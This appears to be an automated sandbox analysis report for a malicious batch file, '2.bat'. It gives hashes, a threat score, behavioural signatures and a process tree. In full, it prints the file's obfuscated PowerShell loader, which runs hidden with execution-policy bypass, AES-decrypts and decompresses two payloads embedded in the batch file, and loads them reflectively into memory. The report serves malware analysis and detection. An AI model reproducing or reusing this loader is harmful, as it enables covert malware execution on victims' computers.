Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18/09/2024, 20:00
Static task
static1
Behavioral task
behavioral1
Sample
2.bat
Resource
win7-20240903-en
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
2.bat
Resource
win10v2004-20240802-en
12 signatures
150 seconds
General
-
Target
2.bat
-
Size
391KB
-
MD5
68fd26440f20aa6790eba0786027ba88
-
SHA1
bd56ea940ae2b97d962e18a255d593a5dc345e0a
-
SHA256
39f91a1c272fa2ed8987492739c90d7d2b56fc8044e6993aa7c44826672a5e05
-
SHA512
7352b0984f7385d90e39e8966e3abfea4ac3fcf4f2262e84ff921fdddc52d7f729b5d2fe91b2f6e44b0906fcc6597085338ca89bedbb697951c6adf733c779d2
-
SSDEEP
12288:wtheuJGmzkb1l9ReZqb0U69HolVXLuLoh4w:meuJ3k3DYP5NJw
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1636 powershell.exe -
Deletes itself 1 IoCs
pid Process 1484 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1636 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1484 wrote to memory of 1988 1484 cmd.exe 32 PID 1484 wrote to memory of 1988 1484 cmd.exe 32 PID 1484 wrote to memory of 1988 1484 cmd.exe 32 PID 1988 wrote to memory of 2088 1988 net.exe 33 PID 1988 wrote to memory of 2088 1988 net.exe 33 PID 1988 wrote to memory of 2088 1988 net.exe 33 PID 1484 wrote to memory of 1636 1484 cmd.exe 34 PID 1484 wrote to memory of 1636 1484 cmd.exe 34 PID 1484 wrote to memory of 1636 1484 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\2.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2088
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CHd1bQrFRfj3sVf6V2NJX/t2XM3oy0ERTV2Xa8JTbJ8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iocaEEyiLt2f2NiQyHjb/Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dDMCC=New-Object System.IO.MemoryStream(,$param_var); $EliqF=New-Object System.IO.MemoryStream; $IvsoA=New-Object System.IO.Compression.GZipStream($dDMCC, [IO.Compression.CompressionMode]::Decompress); $IvsoA.CopyTo($EliqF); $IvsoA.Dispose(); $dDMCC.Dispose(); $EliqF.Dispose(); $EliqF.ToArray();}function execute_function($param_var,$param2_var){ $VFZtL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZtGfA=$VFZtL.EntryPoint; $ZtGfA.Invoke($null, $param2_var);}$khsQT = 'C:\Users\Admin\AppData\Local\Temp\2.bat';$host.UI.RawUI.WindowTitle = $khsQT;$Helfs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($khsQT).Split([Environment]::NewLine);foreach ($CCfkN in $Helfs) { if ($CCfkN.StartsWith(':: ')) { $hQZcZ=$CCfkN.Substring(3); break; }}$payloads_var=[string[]]$hQZcZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636
-